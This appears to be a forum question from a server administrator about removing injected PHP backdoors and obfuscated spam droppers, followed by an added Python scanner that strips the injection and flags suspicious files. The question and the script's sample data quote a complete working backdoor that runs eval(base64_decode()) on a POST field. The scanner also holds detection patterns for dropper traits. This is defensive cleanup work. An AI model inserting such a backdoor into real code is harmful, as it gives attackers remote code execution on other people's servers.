I have multiple VPSes with at least thousands of accounts on them.
My clients' websites have been hacked and are sending spam emails. I checked the logs and found two types of scripts:
type1:
<?php
$d79="HYI\riP=s5`bX'a43Z #fn%dTy9c|JWjMV<z0Q]6&kD}UECrue~mq8->N2hpx_!Bo*g\nK\$O1{7G[^.L+Rw\\;?FA)lt\tS@,/\":(v"; $GLOBALS['ujijy64'] = $d79[4].$d7
type2:
<?php
function wtakziboyl($gaezs, $fp){$vdxhvfmnol = ''; for($i=0; $i < strlen($gaezs); $i++){$vdxhvfmnol .= isset($fp[$gaezs[$i]]) ? $fp[$gaezs[$i]] : $gaezs[$i];}
$otcow="base64_decode";return $otcow($vdxhvfmnol);}
$sfnb = '4fwFMBxy214Q5XBm8exm1XHK2m83NZsBdZpzvpzUMRsz1jCwgJArtfxr1X'.
'Bm8exm8m83NSUzvpzUMRsz1jCwgJArtRhY1XBY2RCIgfwKtwxkMRIw5mpAbJ'.
'aiJa0y21cqgfwE2Bx3MRIzgJApOd3OJeweOfwy8XBkOJcqnkBPBaBPOPaOopQ55hxdcB'.
After further investigation I found injected scripts at the top of genuine files, like the one below:
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}?>
I suspect the above code is a backdoor. I want to remove all those scripts, or at least stop them from executing. Maybe I can use modsec rules.
While searching the internet I found that we can run the command below to remove such an injection:
grep -Rl PCT4BA6ODSE . | xargs sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE \?>/g'
Manually finding such files on servers where thousands of accounts are hosted is next to impossible, so I want to do it automatically (in this case).
I know there are many other backdoors, but for this scenario what do you suggest?
This may not be a good idea and it may affect server performance; I would love to hear any alternative ideas.
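As an added example (this is not part of the original question and not code from the poster's servers), the following Python script does the cleanup the question asks for in a safer way than the one-line grep/sed. Two things are worth knowing about the injected prefix: the string "PCT4BA6ODSE_" indexed as in the snippet spells base64_decode and _POST, so the backdoor is eval(base64_decode($_POST['n828e00'])), i.e. arbitrary PHP from any POST request; and the injection is a complete <?php ... ?> statement prepended before the genuine code, so it must be matched non-greedily up to the first ?>. The sed pattern's greedy .* is line-based and, on a minified file whose genuine code sits on the same line, would swallow that code too, and the xargs pipeline breaks on paths with spaces. The script strips only the known prefix (after copying the original to a quarantine directory), and separately flags files that show several traits of the two obfuscated droppers (eval, a function name held in a string, long base64 concatenations, variable-variable superglobal access) for manual review rather than deleting them, since genuine frameworks also use eval. Function names and the sample PHP files are hypothetical and constructed for the demo.

```python
"""Added example: strip the PCT4BA6ODSE_ prefix injection and flag dropper-like PHP files.
Helper names are hypothetical; the PHP samples below are constructed for the demo."""
from __future__ import annotations

import re
import shutil
import sys
import tempfile
from pathlib import Path

# "PCT4BA6ODSE_"[4,5,9,10,6,3,11,8,10,1,7,8,10] spells BASE64_DECODE and [11,0,7,9,2] spells _POST,
# so the prefix is eval(base64_decode($_POST['n828e00'])). It is one complete <?php ... ?> block,
# hence the non-greedy match up to the FIRST ?> (sed's greedy '.*' would eat genuine code on the same line).
INJECTION_RE = re.compile(r'^\s*<\?php\s*\$sF="PCT4BA6ODSE_";.*?\?>[ \t]*\r?\n?', re.DOTALL)

# Traits shared by the two dropper types. None alone proves malice (frameworks use eval too),
# so a file is only reported when several co-occur, and it is never modified automatically.
MARKERS = {
    "eval": re.compile(r'\beval\s*\('),
    "string-index reassembly": re.compile(r'\$\w+\[\d+\]\s*\.\s*\$\w+\[\d+\]'),   # $d79[4].$d79[7]
    "variable-variable superglobal": re.compile(r'\$\{\$\w+\}'),                  # ${$s20}[...]
    "function name held in a string": re.compile(r'''=\s*["']base64_decode["']'''),
    "long base64 concatenation": re.compile(r"'[A-Za-z0-9+/=]{40,}'\s*\.\s*$", re.M),
}


def strip_injection(source: str) -> tuple[str, bool]:
    """Return (cleaned_source, was_injected); removes only the leading PCT4BA6ODSE_ block."""
    cleaned, n = INJECTION_RE.subn("", source, count=1)
    return cleaned, n == 1


def suspicion_markers(source: str) -> list[str]:
    """Names of dropper traits present in source, for manual review."""
    return [name for name, rx in MARKERS.items() if rx.search(source)]


def scan_tree(root: Path, quarantine: Path, fix: bool = False, min_markers: int = 2) -> dict:
    """Walk root for *.php: strip the known prefix (original copied to quarantine first when
    fix=True) and list files showing at least min_markers dropper traits."""
    report: dict = {"injected": [], "suspicious": {}}
    for path in sorted(root.rglob("*.php")):
        text = path.read_bytes().decode("latin-1")      # byte-preserving, never raises
        cleaned, injected = strip_injection(text)
        rel = str(path.relative_to(root))
        if injected:
            if fix:
                dst = quarantine / path.relative_to(root)
                dst.parent.mkdir(parents=True, exist_ok=True)
                shutil.copy2(path, dst)                  # evidence plus rollback copy
                path.write_bytes(cleaned.encode("latin-1"))
            report["injected"].append(rel)
            text = cleaned
        markers = suspicion_markers(text)
        if len(markers) >= min_markers:
            report["suspicious"][rel] = markers
    return report


# --- constructed samples (not files from the question's servers) ---
INJECTION = ('<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3]'
             '.$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0]'
             '.$sF[7].$sF[9].$sF[2]);if (isset(${$s20}[\'n828e00\'])) {eval($s21(${$s20}[\'n828e00\']));}?>')
GENUINE = "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
DROPPER = ("<?php\nfunction d($s, $m){$o='';for($i=0;$i<strlen($s);$i++){$o.=isset($m[$s[$i]])?$m[$s[$i]]:$s[$i];}\n"
           "$f=\"base64_decode\";return $f($o);}\n"
           "$p = 'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'.\n"
           "'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB';\neval(d($p, array()));\n")


def main(argv: list[str]) -> dict:
    """Usage: scan.py [ROOT] [--fix]. Without ROOT, runs on a constructed tree in a temp dir."""
    fix = "--fix" in argv
    paths = [a for a in argv if not a.startswith("--")]
    if paths:
        root = Path(paths[0])
    else:
        root = Path(tempfile.mkdtemp()) / "home"
        site = root / "site1/public_html"
        (site / "wp-content/uploads").mkdir(parents=True)
        (site / "index.php").write_text(INJECTION + "\n" + GENUINE)   # genuine file with prefix
        (site / "wp-load.php").write_text(GENUINE)                    # clean genuine file
        (site / "wp-content/uploads/cache.php").write_text(DROPPER)   # dropped obfuscated shell
        fix = True
    report = scan_tree(root, root.parent / "quarantine", fix=fix)
    for f in report["injected"]:
        print(("cleaned  " if fix else "injected ") + f)
    for f, m in report["suspicious"].items():
        print(f"REVIEW   {f}: {', '.join(m)}")
    return report


if __name__ == "__main__":
    main(sys.argv[1:])
```

Run it first without --fix to get a report, then with --fix against a path such as /home after a backup; the quarantine copies keep the originals for forensics. Removing the prefix only closes that one entry point: the vector that wrote it (and the droppers the script flags for review) still has to be found and closed, or the files will be reinfected.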